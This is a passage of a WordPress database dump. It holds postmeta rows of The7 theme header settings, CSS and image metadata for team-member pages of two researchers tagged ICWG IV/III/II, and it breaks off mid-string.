(23798,3506,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(23799,3508,'_edit_lock','1672599657:1'),
(23800,3509,'_wp_attached_file','2023/01/w274.jpg'),
(23801,3509,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:152;s:6:\"height\";i:173;s:4:\"file\";s:16:\"2023/01/w274.jpg\";s:8:\"filesize\";i:41703;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w274-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5548;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(23802,3508,'_thumbnail_id','3509'),
(23803,3508,'_edit_last','1'),
(23804,3508,'_dt_sidebar_position','disabled'),
(23805,3508,'_dt_sidebar_widgetarea_id','sidebar_1'),
(23806,3508,'_dt_sidebar_hide_on_mobile','0'),
(23807,3508,'_dt_footer_show','1'),
(23808,3508,'_dt_footer_widgetarea_id','sidebar_2'),
(23809,3508,'_dt_footer_hide_on_mobile','0'),
(23810,3508,'_dt_header_title','fancy'),
(23811,3508,'_dt_header_background','normal'),
(23812,3508,'_dt_header_background_below_slideshow','disabled'),
(23813,3508,'_dt_header_transparent_bg_color_scheme','light'),
(23814,3508,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(23815,3508,'_dt_header_transparent_top_bar_bg_opacity','25'),
(23816,3508,'_dt_header_transparent_bg_color','#000000'),
(23817,3508,'_dt_header_transparent_bg_opacity','50'),
(23818,3508,'_dt_header_disabled_background','normal'),
(23819,3508,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(23820,3508,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(23821,3508,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(23822,3508,'_dt_header_disabled_transparent_bg_color','#000000'),
(23823,3508,'_dt_header_disabled_transparent_bg_opacity','50'),
(23824,3508,'_dt_page_overrides_top_margin',''),
(23825,3508,'_dt_page_overrides_right_margin',''),
(23826,3508,'_dt_page_overrides_bottom_margin',''),
(23827,3508,'_dt_page_overrides_left_margin',''),
(23828,3508,'_dt_mobile_page_padding_top',''),
(23829,3508,'_dt_mobile_page_padding_right',''),
(23830,3508,'_dt_mobile_page_padding_bottom',''),
(23831,3508,'_dt_mobile_page_padding_left',''),
(23832,3508,'_dt_fancy_header_layout_heading',''),
(23833,3508,'_dt_fancy_header_title_aligment','center'),
(23834,3508,'_dt_fancy_header_height','300'),
(23835,3508,'_dt_fancy_header_padding-top','0px'),
(23836,3508,'_dt_fancy_header_padding-bottom','0px'),
(23837,3508,'_dt_fancy_header_breadcrumbs_heading',''),
(23838,3508,'_dt_fancy_header_breadcrumbs','disabled'),
(23839,3508,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(23840,3508,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(23841,3508,'_dt_fancy_header_title_heading',''),
(23842,3508,'_dt_fancy_header_title_mode','custom'),
(23843,3508,'_dt_fancy_header_title','Timur Obukhov'),
(23844,3508,'_dt_fancy_header_title_font_size','30'),
(23845,3508,'_dt_fancy_header_title_line_height','36'),
(23846,3508,'_dt_fancy_header_text_transform','none'),
(23847,3508,'_dt_fancy_header_title_color_mode','color'),
(23848,3508,'_dt_fancy_header_title_color','#ffffff'),
(23849,3508,'_dt_fancy_header_subtitle_heading',''),
(23850,3508,'_dt_fancy_header_subtitle','UN Geospatial, Office of Information and Communications Technology, United Nations (ICWG IV/III/II)'),
(23851,3508,'_dt_fancy_header_subtitle_font_size','18'),
(23852,3508,'_dt_fancy_header_subtitle_line_height','26'),
(23853,3508,'_dt_fancy_header_subtitle_text_transform','none'),
(23854,3508,'_dt_fancy_header_subtitle_color_mode','color'),
(23855,3508,'_dt_fancy_header_subtitle_color','#ffffff'),
(23856,3508,'_dt_fancy_header_bg_heading',''),
(23857,3508,'_dt_fancy_header_bg_color','#222222'),
(23858,3508,'_dt_fancy_header_bg_image_origin','custom'),
(23859,3508,'_dt_fancy_header_bg_image','a:0:{}'),
(23860,3508,'_dt_fancy_header_bg_repeat','no-repeat'),
(23861,3508,'_dt_fancy_header_bg_position_x','center'),
(23862,3508,'_dt_fancy_header_bg_position_y','center'),
(23863,3508,'_dt_fancy_header_bg_fullscreen','1'),
(23864,3508,'_dt_fancy_header_bg_overlay','0'),
(23865,3508,'_dt_fancy_header_overlay_color','#000'),
(23866,3508,'_dt_fancy_header_bg_overlay_opacity','50'),
(23867,3508,'_dt_fancy_header_scroll_effect','default'),
(23868,3508,'_dt_fancy_header_bg_parallax','0.5'),
(23869,3508,'_dt_fancy_header_responsiveness_heading',''),
(23870,3508,'_dt_fancy_header_responsiveness','disabled'),
(23871,3508,'_dt_fancy_header_responsiveness_switch','778px'),
(23872,3508,'_dt_fancy_header_responsive_height','70'),
(23873,3508,'_dt_fancy_header_responsive_font_size','30'),
(23874,3508,'_dt_fancy_header_responsive_title_line_height','38'),
(23875,3508,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(23876,3508,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(23877,3508,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(23878,3508,'_dt_teammate_options_go_to_single','1'),
(23879,3508,'_dt_teammate_options_position',''),
(23880,3508,'_dt_teammate_options_website',''),
(23881,3508,'_dt_teammate_options_mail',''),
(23882,3508,'_dt_teammate_options_facebook',''),
(23883,3508,'_dt_teammate_options_twitter',''),
(23884,3508,'_dt_teammate_options_dribbble',''),
(23885,3508,'_dt_teammate_options_you-tube',''),
(23886,3508,'_dt_teammate_options_rss',''),
(23887,3508,'_dt_teammate_options_delicious',''),
(23888,3508,'_dt_teammate_options_flickr',''),
(23889,3508,'_dt_teammate_options_lastfm',''),
(23890,3508,'_dt_teammate_options_linkedin',''),
(23891,3508,'_dt_teammate_options_vimeo',''),
(23892,3508,'_dt_teammate_options_tumbler',''),
(23893,3508,'_dt_teammate_options_pinterest',''),
(23894,3508,'_dt_teammate_options_devian',''),
(23895,3508,'_dt_teammate_options_skype',''),
(23896,3508,'_dt_teammate_options_github',''),
(23897,3508,'_dt_teammate_options_instagram',''),
(23898,3508,'_dt_teammate_options_stumbleupon',''),
(23899,3508,'_dt_teammate_options_behance',''),
(23900,3508,'_dt_teammate_options_px-500',''),
(23901,3508,'_dt_teammate_options_tripedvisor',''),
(23902,3508,'_dt_teammate_options_vk',''),
(23903,3508,'_dt_teammate_options_foursquare',''),
(23904,3508,'_dt_teammate_options_xing',''),
(23905,3508,'_dt_teammate_options_weibo',''),
(23906,3508,'_dt_teammate_options_odnoklassniki',''),
(23907,3508,'_dt_teammate_options_research-gate',''),
(23908,3508,'_dt_teammate_options_yelp',''),
(23909,3508,'_dt_teammate_options_blogger',''),
(23910,3508,'_dt_teammate_options_soundcloud',''),
(23911,3508,'_dt_teammate_options_viber',''),
(23912,3508,'_dt_teammate_options_whatsapp',''),
(23913,3508,'_dt_teammate_options_reddit',''),
(23914,3508,'_dt_teammate_options_snapchat',''),
(23915,3508,'_dt_teammate_options_telegram',''),
(23916,3508,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(23917,3510,'_edit_lock','1672599763:1'),
(23918,3511,'_wp_attached_file','2023/01/w275.jpg'),
(23919,3511,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:145;s:6:\"height\";i:166;s:4:\"file\";s:16:\"2023/01/w275.jpg\";s:8:\"filesize\";i:33485;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w275-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4986;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(23920,3510,'_thumbnail_id','3511'),
(23921,3510,'_edit_last','1'),
(23922,3510,'_dt_sidebar_position','disabled'),
(23923,3510,'_dt_sidebar_widgetarea_id','sidebar_1'),
(23924,3510,'_dt_sidebar_hide_on_mobile','0'),
(23925,3510,'_dt_footer_show','1'),
(23926,3510,'_dt_footer_widgetarea_id','sidebar_2'),
(23927,3510,'_dt_footer_hide_on_mobile','0'),
(23928,3510,'_dt_header_title','fancy'),
(23929,3510,'_dt_header_background','normal'),
(23930,3510,'_dt_header_background_below_slideshow','disabled'),
(23931,3510,'_dt_header_transparent_bg_color_scheme','light'),
(23932,3510,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(23933,3510,'_dt_header_transparent_top_bar_bg_opacity','25'),
(23934,3510,'_dt_header_transparent_bg_color','#000000'),
(23935,3510,'_dt_header_transparent_bg_opacity','50'),
(23936,3510,'_dt_header_disabled_background','normal'),
(23937,3510,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(23938,3510,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(23939,3510,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(23940,3510,'_dt_header_disabled_transparent_bg_color','#000000'),
(23941,3510,'_dt_header_disabled_transparent_bg_opacity','50'),
(23942,3510,'_dt_page_overrides_top_margin',''),
(23943,3510,'_dt_page_overrides_right_margin',''),
(23944,3510,'_dt_page_overrides_bottom_margin',''),
(23945,3510,'_dt_page_overrides_left_margin',''),
(23946,3510,'_dt_mobile_page_padding_top',''),
(23947,3510,'_dt_mobile_page_padding_right',''),
(23948,3510,'_dt_mobile_page_padding_bottom',''),
(23949,3510,'_dt_mobile_page_padding_left',''),
(23950,3510,'_dt_fancy_header_layout_heading',''),
(23951,3510,'_dt_fancy_header_title_aligment','center'),
(23952,3510,'_dt_fancy_header_height','300'),
(23953,3510,'_dt_fancy_header_padding-top','0px'),
(23954,3510,'_dt_fancy_header_padding-bottom','0px'),
(23955,3510,'_dt_fancy_header_breadcrumbs_heading',''),
(23956,3510,'_dt_fancy_header_breadcrumbs','disabled'),
(23957,3510,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(23958,3510,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(23959,3510,'_dt_fancy_header_title_heading',''),
(23960,3510,'_dt_fancy_header_title_mode','custom'),
(23961,3510,'_dt_fancy_header_title','Bolelang Sibolla'),
(23962,3510,'_dt_fancy_header_title_font_size','30'),
(23963,3510,'_dt_fancy_header_title_line_height','36'),
(23964,3510,'_dt_fancy_header_text_transform','none'),
(23965,3510,'_dt_fancy_header_title_color_mode','color'),
(23966,3510,'_dt_fancy_header_title_color','#ffffff'),
(23967,3510,'_dt_fancy_header_subtitle_heading',''),
(23968,3510,'_dt_fancy_header_subtitle','Council for Scientific and Industrial Research, South Africa (ICWG IV/III/II)'),
(23969,3510,'_dt_fancy_header_subtitle_font_size','18'),
(23970,3510,'_dt_fancy_header_subtitle_line_height','26'),
(23971,3510,'_dt_fancy_header_subtitle_text_transform','none'),
(23972,3510,'_dt_fancy_header_subtitle_color_mode','color'),
(23973,3510,'_dt_fancy_header_subtitle_color','#ffffff'),
(23974,3510,'_dt_fancy_header_bg_heading',''),
(23975,3510,'_dt_fancy_header_bg_color','#222222'),
(23976,3510,'_dt_fancy_header_bg_image_origin','custom'),
(23977,3510,'_dt_fancy_header_bg_image','a:0:{}'),
(23978,3510,'_dt_fancy_header_bg_repeat','no-repeat'),
(23979,3510,'_dt_fancy_header_bg_position_x','center'),
(23980,3510,'_dt_fancy_header_bg_position_y','center'),
(23981,3510,'_dt_fancy_header_bg_fullscreen','1'),
(23982,3510,'_dt_fancy_header_bg_overlay','0'),
(23983,3510,'_dt_fancy_header_overlay_color','#000'),
(23984,3510,'_dt_fancy_header_bg_overlay_opacity','50'),
(23985,3510,'_dt_fancy_header_scroll_effect','default'),
(23986,3510,'_dt_fancy_header_bg_parallax','0.5'),
(23987,3510,'_dt_fancy_header_responsiveness_heading',''),
(23988,3510,'_dt_fancy_header_responsiveness','disabled'),
(23989,3510,'_dt_fancy_header_responsiveness_switch','778px'),
(23990,3510,'_dt_fancy_header_responsive_height','70'),
(23991,3510,'_dt_fancy_header_responsive_font_size','30'),
(23992,3510,'_dt_fancy_header_responsive_title_line_height','38'),
(23993,3510,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(23994,3510,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(23995,3510,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(23996,3510,'_dt_teammate_options_go_to_single','1'),
(23997,3510,'_dt_teammate_options_position',''),
(23998,3510,'_dt_teammate_options_website',''),
(23999,3510,'_dt_teammate_options_mail',''),
(24000,3510,'_dt_teammate_options_facebook',''),
(24001,3510,'_dt_teammate_options_twitter',''),
(24002,3510,'_dt_teammate_options_dribbble',''),
(24003,3510,'_dt_teammate_options_you-tube',''),
(24004,3510,'_dt_teammate_options_rss',''),
(24005,3510,'_dt_teammate_options_delicious',''),
(24006,3510,'_dt_teammate_options_flickr',''),
(24007,3510,'_dt_teammate_options_lastfm',''),
(24008,3510,'_dt_teammate_options_linkedin',''),
(24009,3510,'_dt_teammate_options_vimeo',''),
(24010,3510,'_dt_teammate_options_tumbler',''),
(24011,3510,'_dt_teammate_options_pinterest',''),
(24012,3510,'_dt_teammate_options_devian',''),
(24013,3510,'_dt_teammate_options_skype',''),
(24014,3510,'_dt_teammate_options_github',''),
(24015,3510,'_dt_teammate_options_instagram',''),
(24016,3510,'_dt_teammate_options_stumbleupon',''),
(24017,3510,'_dt_teammate_options_behance',''),
(24018,3510,'_dt_teammate_options_px-500',''),
(24019,3510,'_dt_teammate_options_tripedvisor',''),
(24020,3510,'_dt_teammate_options_vk',''),
(24021,3510,'_dt_teammate_options_foursquare',''),
(24022,3510,'_dt_teammate_options_xing',''),
(24023,3510,'_dt_teammate_options_weibo',''),
(24024,3510,'_dt_teammate_options_odnoklassniki',''),
(24025,3510,'_dt_teammate_options_research-gate',''),
(24026,3510,'_dt_teammate_options_yelp',''),
(24027,3510,'_dt_teammate_options_blogger',''),
(24028,3510,'_dt_teammate_options_soundcloud',''),
(24029,3510,'_dt_teammate_options_viber',''),
(24030,3510,'_dt_teammate_options_whatsapp',''),
(24031,3510,'_dt_teammate_options_reddit',''),
(24032,3510,'_dt_teammate_options_snapchat',''),
(24033,3510,'_dt_teammate_options_telegram',''),
(24034,3510,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(24035,3510,'rs_page_bg_color',''),
(24036,3508,'rs_page_bg_color',''),
(24037,3506,'rs_page_bg_color',''),
(24038,3504,'rs_page_bg_color',''),
(24039,3502,'rs_page_bg_color',''),
(24040,3497,'the7_shortcodes_dynamic_css','a:2:{s:32:\"528ce340cee05b9fe9212ecbe3d2ba9f\";s:6837:\".dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f  .team-media {\n  padding: 5px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f  .team-media img {\n  max-width: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f .dt-css-grid .team-media img {\n  width: 100px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-528ce340cee05b9fe9212ecbe3d2ba9f.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: 